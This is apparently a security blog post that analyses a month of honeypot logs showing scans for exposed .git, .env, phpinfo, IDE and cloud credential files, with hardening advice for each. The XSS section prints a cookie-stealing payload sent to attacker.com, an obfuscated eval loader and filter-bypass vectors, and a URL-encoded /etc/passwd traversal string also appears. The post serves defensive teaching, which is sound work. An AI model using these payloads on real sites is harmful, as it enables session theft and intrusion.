Analysis of Web Application Intrusion Attempts

I deployed a honeypot to observe real-world web application attack patterns. Over the course of a month, I collected 1,619 intrusion attempts targeting various endpoints. The results reveal what attackers are actively scanning for and offer insight into the common misconfigurations that threat actors exploit. This analysis breaks down the top threats discovered, explains the risks they pose, and provides practical hardening recommendations to protect your applications.


Prerequisites:

A basic understanding of web application architecture, cybersecurity, popcorn, and your favorite caffeinated beverage!

The Numbers

In total, my honeypot recorded 1,619 distinct intrusion attempts across various endpoints. The attack distribution revealed clear patterns in what threat actors prioritize when scanning for vulnerabilities. The top three categories alone accounted for over 17% of all attempts, with exposed Git repositories, environment files, and information disclosure endpoints dominating the landscape. Let's dive into what these attacks look like and why they matter.

1. Git Repository Exposure (7.23% of all attempts)

The single most targeted endpoint was /.git/config with 117 attempts, followed by /.git/HEAD with 12. When developers initialize a Git repository in their web application directory and deploy it to production without proper configuration, the entire .git folder becomes publicly accessible. This is a critical security vulnerability that many organizations overlook.

The .git/config file contains repository configuration including remote URLs, branch information, and potentially credentials if developers have hardcoded them. The .git/HEAD file reveals the current branch. But the real danger lies in what comes next. Once an attacker confirms the presence of a .git directory, they can use tools like GitDumper or git-dumper to recursively download the entire repository history, including all commits, branches, and deleted files.

What can happen if exploited: Attackers gain access to your entire source code, including historical commits that may contain accidentally committed secrets, API keys, database credentials, or proprietary algorithms. In 2016, Uber experienced a breach where attackers found AWS credentials in a private GitHub repository, leading to the exposure of 57 million user records. Even deleted commits remain in Git history and can reveal sensitive information that developers thought they had removed.

Hardening recommendations:

In your web server configuration, block access to any version control directories, or include a compensating control, like a WAF, to assist in preventing access. Better yet, never deploy your .git folder to production. Use a proper CI/CD pipeline that builds artifacts without version control metadata. If you're using Docker, ensure your .dockerignore file includes .git. For manual deployments, use git archive to create clean deployment packages:

git archive --format=tar HEAD | tar -x -C /path/to/deployment
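The web server rule mentioned above can be sketched in a few lines. Here is an Nginx example (Apache admins would use a matching RedirectMatch or FilesMatch rule); it intentionally covers every dot-file and dot-directory, not just .git, while still allowing /.well-known/ for ACME certificate challenges:

```nginx
# Deny all hidden files and directories (.git, .env, .aws, .ssh, ...)
# while still permitting /.well-known/ for Let's Encrypt.
# Returning 404 avoids confirming to scanners that the path exists.
location ~ /\.(?!well-known/) {
    return 404;
}
```

Treat this as a compensating control only; the real fix is never shipping the .git directory in the first place.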

2. Environment File Exposure (6.92% + variations)

Environment files dominated the attack landscape with /.env receiving 112 direct attempts. However, when you include variations like /api/.env (23 attempts), /backend/.env (18 attempts), /.env.bak (18 attempts), and dozens of other variations, environment file enumeration becomes the most significant attack category overall. Attackers understand that developers often create backup copies, use different env files for different environments, or place them in various subdirectories.

Environment files store application secrets in a centralized location, making them a high-value target. A typical .env file might contain:

# Database credentials
DB_HOST=prod-db.company.internal
DB_DATABASE=production_db
DB_USERNAME=app_user
DB_PASSWORD=P@ssw0rd123!

# AWS credentials
AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
AWS_DEFAULT_REGION=us-east-1

# API keys
STRIPE_SECRET_KEY=sk_live_51H...
SENDGRID_API_KEY=SG.abc123...
TWILIO_AUTH_TOKEN=abc123...

# JWT secrets
JWT_SECRET=supersecretkey12345
SESSION_SECRET=anothersecretkey67890

# Application settings
APP_DEBUG=true
APP_URL=https://api.example.com

What can happen if exploited: In 2024, security researchers at Palo Alto Networks Unit 42 tracked a large-scale cloud extortion campaign that specifically targeted exposed .env files. They discovered over 110,000 domains with publicly accessible environment files containing more than 90,000 unique secrets. Attackers used these credentials to access cloud storage buckets, databases, and third-party services. The threat actors would exfiltrate sensitive data and then demand ransom payments to prevent public disclosure.

Once an attacker has your database credentials, they can dump your entire database including user credentials, personal information, and business data. AWS credentials can lead to complete cloud infrastructure takeover, including the ability to spin up expensive resources, access S3 buckets, or modify security groups. API keys for services like Stripe can result in financial theft, while email service credentials enable phishing campaigns sent from your legitimate domains.

Hardening recommendations:

First, ensure .env files are never committed to version control by adding them to your .gitignore. Configure your web server of choice to deny access to environment files. For production environments, consider using a secrets management solution like HashiCorp Vault, AWS Secrets Manager, or Azure Key Vault instead of flat files. These systems provide encryption at rest, access logging, automatic rotation, and fine-grained access controls. If you must use environment files, ensure they're stored outside your web root directory and loaded via your application configuration. Implement defense in depth by restricting file permissions on your production servers.
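As a quick self-audit before or after each deploy, a find sweep over the web root catches stray env files and backup variants. The default path here is an assumption, so point WEBROOT at your own deploy directory:

```shell
# Sweep a web root for .env files and common backup variants.
# WEBROOT is illustrative -- override it for your layout.
WEBROOT="${WEBROOT:-/var/www/html}"
if [ -d "$WEBROOT" ]; then
  find "$WEBROOT" -type f \
    \( -name ".env" -o -name ".env.*" -o -name "*.env" -o -name "*.bak" \) \
    -print
fi
```

Anything this prints should be deleted or moved outside the web root; wiring the same check into CI as a failing build step keeps it from regressing.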

3. PHPInfo Exposure (1.73% + variations)

The /phpinfo.php endpoint received 28 attempts, with variations like /phpinfo (23 attempts), /_profiler/phpinfo (18 attempts), and /xampp/phpinfo.php (5 attempts) adding to the total. The phpinfo() function is incredibly useful during development as it displays comprehensive information about your PHP configuration, loaded modules, environment variables, and server details.

However, when left accessible in production, it becomes a reconnaissance goldmine for attackers. The output includes PHP version numbers, enabled extensions, file paths, environment variables (which may contain secrets), and detailed server configuration. This information helps attackers identify specific vulnerabilities, understand your application architecture, and plan targeted attacks.

What can happen if exploited: An exposed phpinfo page reveals your exact PHP version, allowing attackers to look up CVEs and known exploits that target that specific version. The disable_functions directive shows attackers exactly which dangerous functions are blocked and, by omission, which attack vectors remain available. The page exposes your document root, file paths, and included configuration files, helping attackers understand your directory structure for path traversal attacks. Environment variables displayed in phpinfo often contain database credentials, API keys, and other secrets that developers incorrectly assume are "safe" because they're not in files.

In 2019, researchers discovered that many WordPress sites had phpinfo pages left accessible, which revealed database credentials in the environment variables section. Attackers could use this information to directly access databases without needing to exploit the application itself.

Hardening recommendations:

The simplest solution is to delete all phpinfo files from your production environment. Use a find command to locate them:

find /var/www -name "phpinfo.php" -type f
find /var/www -name "*info.php" -type f

If you need to keep diagnostic capabilities for troubleshooting, implement authentication and IP restrictions. Better yet, create an administrative interface accessible only through VPN or bastion host rather than exposing diagnostic tools to the public internet.

4. IDE Configuration Files

VS Code SFTP configuration files (/.vscode/sftp.json) appeared 24 times in the logs. These configuration files, created by popular IDE extensions, often contain FTP/SFTP credentials for remote deployment. The contents typically look like this:

{
  "name": "Production Server",
  "host": "ftp.example.com",
  "protocol": "sftp",
  "port": 22,
  "username": "deploy_user",
  "password": "PlainTextPassword123!",
  "remotePath": "/var/www/html",
  "uploadOnSave": true,
  "useTempFile": false
}

Other development artifacts like /.DS_Store (20 attempts), metadata files created by the macOS Finder, reveal directory structures and file metadata. While less severe than credential exposure, these files aid reconnaissance by showing attackers your project structure, file names, and potentially sensitive directory names.

What can happen if exploited: Exposed SFTP credentials give attackers direct server access with the same privileges as your deployment user, often allowing them to modify application code, inject backdoors, or access other files on the server. The remotePath field tells them exactly where your application is deployed, and the username reveals what system account to target for privilege escalation attempts.

Hardening recommendations:

Add IDE-specific directories such as .vscode to your .gitignore, and block access to them in your web server configuration. Most importantly, never store credentials in IDE configuration files. Use SSH key-based authentication instead of passwords, and store keys outside your project directory. For the VS Code SFTP extension, use key-based auth:

{
  "name": "Production",
  "host": "example.com",
  "protocol": "sftp",
  "port": 22,
  "username": "deploy",
  "privateKeyPath": "~/.ssh/deploy_key",
  "remotePath": "/var/www/html"
}

5. Cloud Provider Credentials

AWS credentials files (/.aws/credentials with 12 attempts and /.aws/config with 6 attempts) represent another high-value target. These files, typically stored in a user's home directory, contain AWS access keys that grant programmatic access to AWS services. Similar patterns appeared for Azure (/.azure/credentials, /.azure/accessTokens.json) and Google Cloud (/.config/gcloud/credentials.db, /.boto) credentials.

The AWS credentials file format is straightforward and deadly when exposed:

[default]
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY

[production]
aws_access_key_id = AKIAI44QH8DHBEXAMPLE
aws_secret_access_key = je7MtGbClwBF/2Zp9Utk/h3yCo8nvbEXAMPLEKEY
region = us-east-1

What can happen if exploited: Compromised cloud credentials can lead to catastrophic breaches. Attackers can access S3 buckets containing sensitive data, spin up expensive EC2 instances for cryptocurrency mining (resulting in massive bills), modify security groups to create persistent backdoors, access RDS databases, or use compromised accounts as a pivot point to attack other resources in your cloud environment.

In 2018, Tesla's Kubernetes console was found unsecured, allowing attackers to access AWS credentials stored in environment variables. The attackers used these credentials to run cryptomining operations on Tesla's infrastructure. In 2019, Capital One suffered a breach affecting 100 million customers when an attacker exploited a misconfigured WAF to access cloud credentials.

Hardening recommendations:

Never deploy AWS credential files to production servers or commit them to version control. Add them to .gitignore. For production workloads, use IAM roles and instance profiles instead of static credentials. If you must use static credentials, store them in AWS Secrets Manager or Systems Manager Parameter Store and retrieve them programmatically at runtime. Implement the principle of least privilege by creating IAM policies that grant only the specific permissions each application needs.
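To make the least-privilege point concrete, here is a sketch of an IAM policy scoped to object reads and writes in a single bucket; the bucket name and Sid are hypothetical, and your application may need a different set of actions:

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "AppObjectAccessOnly",
      "Effect": "Allow",
      "Action": ["s3:GetObject", "s3:PutObject"],
      "Resource": "arn:aws:s3:::my-app-assets/*"
    }
  ]
}
```

A policy like this limits the blast radius of a leaked credential to one bucket's objects, rather than the whole account.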

6. WordPress Configuration Backups

Ahhh WordPress. Typically a security nightmare... The presence of /wp-config.php.bak (6 attempts) and /.wp-config.php.swp (1 attempt) highlights a common mistake where backup files or editor swap files expose WordPress database credentials. While wp-config.php is processed by PHP and doesn't expose its source code, backup files with extensions like .bak, .old, .swp, or .save are served as plain text.

What can happen if exploited: WordPress configuration files contain database credentials, authentication salts, and security keys. Exposed database credentials allow attackers to dump your entire WordPress database including user credentials (which can be cracked), post content, and any sensitive data stored in custom fields. They can also inject new admin users, modify post content, or insert malicious code into the database that gets executed when pages load.

Hardening recommendations:

Configure your web server to deny access to backup files and editor swap files (for example, a pattern matching extensions like bak|config|sql|fla|psd|ini|log|sh|inc|swp|dist|old). Regularly audit your web directory for backup files using the find command or a web scanner. For WordPress specifically, move wp-config.php one directory above the web root if your hosting environment allows it. WordPress will automatically look for the configuration file in the parent directory, making it inaccessible via web requests.
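That deny rule can be sketched in Nginx like this (extend the extension list to match your environment; Apache users can express the same with a FilesMatch block):

```nginx
# Serve nothing that looks like a backup or editor artifact.
location ~* \.(bak|old|orig|save|swp|dist|sql|log|ini|inc|sh)$ {
    return 404;
}
```

Returning 404 rather than 403 avoids confirming to a scanner that the file exists at all.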

7. Path Traversal Attempts

Several entries showed classic path traversal attempts like /%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd. URL encoding (%2F = /, %2E = .) is used to bypass basic filtering. These attacks attempt to break out of the web root and access system files like /etc/passwd, which contains user account information on Linux systems.

What can happen if exploited: Successful path traversal can expose sensitive system files including /etc/passwd (user accounts), /etc/shadow (password hashes if web server runs as root), application configuration files, database files, or even private SSH keys. Attackers use this information for privilege escalation, credential harvesting, or understanding system architecture for further attacks.

Hardening recommendations:

Never construct file paths directly from user input. Use a whitelist approach for file access:

// Bad: user input flows directly into the include path
$file = $_GET['file'];
include("/var/www/files/" . $file);

// Good: only files on the whitelist can be included
$allowed_files = ['page1.php', 'page2.php', 'page3.php'];
$file = $_GET['file'];
if (in_array($file, $allowed_files)) {
    include("/var/www/files/" . $file);
}

If you must accept file paths, validate and sanitize them rigorously:

// Use realpath() to resolve the actual path
$file = basename($_GET['file']); // Remove path components
$full_path = realpath('/var/www/files/' . $file);

// Ensure the resolved path is within the intended directory
if ($full_path && strpos($full_path, realpath('/var/www/files/')) === 0) {
    include($full_path);
}

Configure your web server to reject encoded traversal sequences where its configuration allows. Run your web application with minimal privileges using a dedicated user account that has no shell access and limited file system permissions. Use chroot jails or containers to limit what the application can access even if path traversal occurs.
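On systemd-based hosts, a few unit directives get you most of the way to that minimal-privilege posture. The service, user, and path names here are hypothetical:

```ini
# /etc/systemd/system/my-app.service (excerpt)
[Service]
User=www-app
NoNewPrivileges=true
PrivateTmp=true
ProtectSystem=strict
ProtectHome=true
ReadWritePaths=/var/www/html/uploads
```

With ProtectSystem=strict the entire filesystem is read-only for the service, so even a successful traversal or code injection can write only to the explicitly listed paths.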

8. The Long Tail: Sophisticated and Niche Attacks

While the common attacks grab headlines with their volume, the least frequent attempts in my honeypot data reveal a more sophisticated and targeted approach. These single-occurrence attacks (each representing 0.06% of total attempts) show attackers probing for specific cloud platforms, specialized development tools, and unique configuration files. Let's examine some of the most interesting uncommon attacks.

Kubernetes Configuration Exposure (/.kube/config): This file contains cluster authentication credentials, API server endpoints, and certificate data for Kubernetes clusters. The typical kubeconfig file looks like this:

apiVersion: v1
clusters:
- cluster:
    certificate-authority-data: LS0tLS1CRUdJTi...
    server: https://kubernetes.example.com:6443
  name: production-cluster
contexts:
- context:
    cluster: production-cluster
    user: admin-user
  name: production-context
current-context: production-context
kind: Config
users:
- name: admin-user
  user:
    client-certificate-data: LS0tLS1CRUdJTi...
    client-key-data: LS0tLS1CRUdJTi...

If exposed, this file grants an attacker complete control over your Kubernetes cluster. They can deploy malicious containers, access secrets stored in the cluster, exfiltrate data from pods, modify deployments, or use the cluster for cryptomining. The 2018 Tesla breach involved exposed Kubernetes credentials that allowed attackers to access the cluster and steal AWS credentials from pod environment variables.

Hardening: Never store kubeconfig files in web-accessible directories. Use Kubernetes service accounts with role-based access control (RBAC) for applications running in the cluster, and use short-lived tokens rather than static credentials. For external access, implement proper authentication through an identity provider with MFA enabled.
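A minimal RBAC sketch for an in-cluster application looks like this; the namespace, role, and service account names are hypothetical, and real policies should be scoped just as narrowly:

```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  namespace: app
  name: config-reader
rules:
- apiGroups: [""]
  resources: ["configmaps"]
  verbs: ["get", "list"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  namespace: app
  name: config-reader-binding
subjects:
- kind: ServiceAccount
  name: app-sa
  namespace: app
roleRef:
  kind: Role
  name: config-reader
  apiGroup: rbac.authorization.k8s.io
```

The application's pods run as app-sa and can read ConfigMaps in their own namespace, and nothing else; a compromised pod cannot enumerate cluster secrets or modify deployments.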

SSH Configuration Files (/.ssh/sftp-config.json): This attempt targets SFTP client configuration files that often contain SSH private keys or connection credentials. While properly configured SSH uses key-based authentication, many developers store configuration with references to private key locations or worse, embedded private keys directly in JSON configuration:

{
  "type": "sftp",
  "host": "production.example.com",
  "user": "deploy",
  "port": 22,
  "remotePath": "/var/www/production",
  "privateKeyPath": "/home/user/.ssh/id_rsa",
  "passphrase": "KeyPassword123!"
}

If an attacker finds the private key path and the key itself is also exposed (common when developers commit their entire .ssh directory), they gain direct SSH access to production servers. Even knowing the username and server address aids reconnaissance.

Hardening: Never store SSH private keys in web-accessible locations or commit them to repositories. Use SSH agent forwarding or bastion hosts for deployment access. Implement certificate-based SSH authentication with short-lived certificates instead of long-lived keys.
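Certificate-based SSH can be sketched entirely with stock OpenSSH tooling. All file names below are illustrative, and in practice the CA private key would live on a hardened signing host, not a developer machine:

```shell
# Work in a throwaway directory for the demo.
cd "$(mktemp -d)"

# One-time: create a CA key pair (no passphrase, demo only).
ssh-keygen -q -t ed25519 -f ssh_ca -N "" -C "example-ca"

# The deploy user's own key pair.
ssh-keygen -q -t ed25519 -f deploy_key -N "" -C "deploy@example"

# Sign the public key: identity "deploy@ci", principal "deploy",
# valid for 8 hours. Produces deploy_key-cert.pub.
ssh-keygen -q -s ssh_ca -I deploy@ci -n deploy -V +8h deploy_key.pub

ls deploy_key-cert.pub
```

Servers then trust the CA via TrustedUserCAKeys in sshd_config, so individual public keys never need to be distributed and access expires automatically with the certificate.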

Multi-Cloud Credential Files: The honeypot detected attempts for Azure credentials (/.azure/credentials, /.azure/accessTokens.json), Google Cloud credentials (/.config/gcloud/application_default_credentials.json, /.config/gcloud/credentials.db), and legacy Google Cloud credentials (/.boto). The .boto file is particularly interesting as it's used by older Google Cloud Storage tools and the AWS S3 compatibility layer:

[Credentials]
gs_access_key_id = GOOG1E...
gs_secret_access_key = abc123...

[Boto]
https_validate_certificates = True

[GSUtil]
default_project_id = my-project-12345

The presence of these varied cloud credential attempts suggests attackers are running comprehensive cloud platform enumeration, recognizing that organizations increasingly use multi-cloud strategies. A single exposed credential file could provide access to storage buckets containing terabytes of sensitive data.

Hardening: For Google Cloud, use workload identity federation or service account impersonation instead of static keys. For Azure, use managed identities. Store all cloud credentials in platform-specific secret management services, not in files. Implement Cloud Asset Inventory and Security Command Center monitoring to detect unusual access patterns.

Payment Provider Credentials (/.env.stripe, /.env.payment, /.stripe.bak, /sendgrid.env, /twilio.env): These highly specific attacks target environment files for payment processing and communication services. Finding a Stripe secret key provides the ability to process refunds, access customer payment information, or create charges. A typical secrets file might contain:

# .env.stripe
STRIPE_PUBLISHABLE_KEY=pk_live_51H...
STRIPE_SECRET_KEY=sk_live_51H...
STRIPE_WEBHOOK_SECRET=whsec_...

# SendGrid/Twilio for customer communications
SENDGRID_API_KEY=SG.abc123...
TWILIO_ACCOUNT_SID=AC...
TWILIO_AUTH_TOKEN=...

Compromised Stripe keys enable attackers to access customer payment methods, process fraudulent refunds to their own accounts, or view complete transaction history including PII. SendGrid and Twilio credentials allow attackers to send phishing emails or SMS messages from your legitimate domains and phone numbers, making their attacks more credible to your customers.

Hardening: Use restricted API keys when possible (Stripe allows you to create keys with limited permissions). Implement webhook signature verification to prevent replay attacks. Store payment-related credentials in PCI-compliant secret storage with audit logging. Monitor API usage for anomalies like unusual refund patterns or geographic irregularities. Enable rate limiting and alerts through your payment provider's dashboard.

XSS Probe (/%3Cscript%3E%3C/script%3E): This URL-encoded XSS attempt (<script></script>) tests if your application reflects user input back in responses without proper sanitization. While this particular probe is benign, a successful reflection indicates the application might be vulnerable to Cross-Site Scripting attacks. Modern XSS exploits can be far more sophisticated:

# Simple reflected XSS
<script>document.location='http://attacker.com/steal?cookie='+document.cookie</script>

# Obfuscated payload via an event handler
<img src=x onerror="eval(atob('BASE64_ENCODED_PAYLOAD'))">

# Bypassing WAF filters
<svg/onload=alert(1)>
<iframe src="javascript:alert(1)">

Successful XSS allows attackers to steal session cookies, perform actions as the victim user, keylog credentials, or redirect users to phishing sites. In the context of administrative interfaces, XSS can lead to complete application compromise.

Hardening: Implement Content Security Policy (CSP) headers to restrict what scripts can execute:

# Strong CSP header
Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'; frame-ancestors 'none';

Always encode output based on context (HTML entity encoding for HTML context, JavaScript encoding for JS context, URL encoding for URLs). Use modern frameworks with automatic XSS protection like React (which escapes by default) or template engines with auto-escaping. Implement HTTPOnly and Secure flags on all cookies to prevent JavaScript access and ensure transmission only over HTTPS.
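The cookie flags mentioned above combine into a single response header like this (the cookie name and value are illustrative):

```http
Set-Cookie: session=abc123; Path=/; HttpOnly; Secure; SameSite=Lax
```

HttpOnly keeps the value out of reach of document.cookie, Secure restricts it to HTTPS, and SameSite limits cross-site sending, which also blunts CSRF.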

Development Environment Files (/.env.travis, /.env.docker, /.env.dev.local): These attempts target CI/CD and development-specific environment files. Travis CI, Docker Compose, and local development environments often have separate configuration files that developers incorrectly assume are "safe" because they're not production credentials. However, these files frequently contain:

# .env.travis (CI/CD secrets)
DEPLOY_KEY=ssh-rsa AAAAB3NzaC1yc2E...
NPM_TOKEN=npm_abc123...
DOCKER_USERNAME=company
DOCKER_PASSWORD=P@ssw0rd

# .env.docker (local dev that mirrors prod structure)
DATABASE_URL=postgresql://user:pass@localhost:5432/dev_db
API_KEY=same_key_as_production_because_developer_was_lazy

CI/CD credentials can allow attackers to inject malicious code into your build pipeline, leading to supply chain attacks where backdoors get deployed to production automatically. Development credentials often work in production because developers reuse them for convenience.

Hardening: Use different credentials for every environment without exception. Store CI/CD secrets in the platform's native secret management (GitHub Secrets, GitLab CI/CD variables, Travis encrypted variables). Never commit any .env variant to version control. Implement branch protection rules that require code review before merging changes to deployment configurations.
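As one example of keeping secrets in the CI platform rather than a committed file, a GitHub Actions step can pull a deploy key from repository secrets at run time; the secret and script names here are hypothetical:

```yaml
# .github/workflows/deploy.yml (excerpt)
jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Deploy
        env:
          DEPLOY_KEY: ${{ secrets.DEPLOY_KEY }}
        run: ./scripts/deploy.sh
```

The secret never lands in the repository, is masked in build logs, and can be rotated in one place without touching the codebase.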

The Sophistication Signal: While each of these attacks appeared only once in my dataset, their presence indicates that attackers are running comprehensive enumeration scripts that check for hundreds or thousands of potential exposures. The specificity of files like /.github/stripe.env or /.env.payment suggests attackers have studied real-world codebases and identified patterns in how developers organize sensitive configurations.

These low-frequency attacks are particularly dangerous because organizations often focus security efforts on common threats while overlooking niche exposures. A single exposed Kubernetes config or payment provider key can be just as devastating as the more common .env file exposure, but receives less attention in security hardening efforts.

Defense in Depth Strategy

While I've provided specific hardening recommendations for each attack type, effective security requires a layered defense strategy. No single control is foolproof, so implementing multiple security layers ensures that if one fails, others remain in place.

Start with secure development practices including threat modeling, secure code review, and avoiding hardcoded secrets. Use a secrets management system like HashiCorp Vault, AWS Secrets Manager, or Azure Key Vault for all sensitive credentials. Implement proper input validation and output encoding throughout your application to prevent injection attacks.

At the web server level, configure restrictive file access rules, disable directory listing, and implement rate limiting to slow down automated scanning. Use a Web Application Firewall (WAF) to filter malicious requests before they reach your application. Cloudflare, AWS WAF, and ModSecurity provide solid options depending on your infrastructure.

For deployment security, never deploy development artifacts to production. Use CI/CD pipelines that build clean deployment packages without version control directories, IDE configurations, or development dependencies. Implement infrastructure as code to ensure consistent, reviewed configurations across all environments.

Enable comprehensive logging and monitoring to detect attacks in progress. Configure alerts for suspicious patterns like repeated 404 errors on sensitive endpoints, unusual file access attempts, or geographic anomalies in traffic patterns. Tools like Fail2Ban can automatically block IP addresses showing malicious behavior.
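Fail2Ban ships a jail aimed at exactly the scanning pattern documented in this post: bursts of requests for files that do not exist. Enabling it can be sketched like this (the thresholds are illustrative; tune them for your traffic and verify the jail name against your installed fail2ban version):

```ini
# /etc/fail2ban/jail.local
[nginx-botsearch]
enabled  = true
port     = http,https
logpath  = /var/log/nginx/access.log
maxretry = 10
findtime = 600
bantime  = 3600
```

With these settings, an IP that triggers the bot-search filter ten times within ten minutes is banned for an hour, which is enough to break most automated enumeration runs.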

Regular security audits should include automated vulnerability scanning, manual penetration testing, and security code reviews. Use tools like OWASP ZAP, Burp Suite, or Nikto to scan for common vulnerabilities. Review your web server logs periodically to identify attack patterns you might have missed.

Lessons from the Honeypot

This honeypot exercise revealed that attackers use automated scanners to probe thousands of common misconfiguration patterns. The sheer variety of .env file variations (over 40 different paths) shows that attackers understand developer habits, backup naming conventions, and common directory structures.

The attacks weren't sophisticated but methodical, probing for low-hanging fruit that provides high-value access. This emphasizes that you don't need advanced exploits to compromise systems when basic security hygiene is neglected. Most of these vulnerabilities result from convenience during development that never gets hardened for production.

If your organization is serious about security, invest time in secure CI/CD pipelines, proper secrets management, and security testing as part of your deployment process. The attacks documented here are trivial to prevent with proper configuration, yet they remain prevalent because they succeed often enough to make automated scanning worthwhile for attackers.

Stay vigilant, keep your systems patched, and remember that security is not a one-time implementation but an ongoing process. Every new feature, every deployment, and every configuration change is an opportunity to either strengthen or weaken your security posture.

Links That I Found Useful: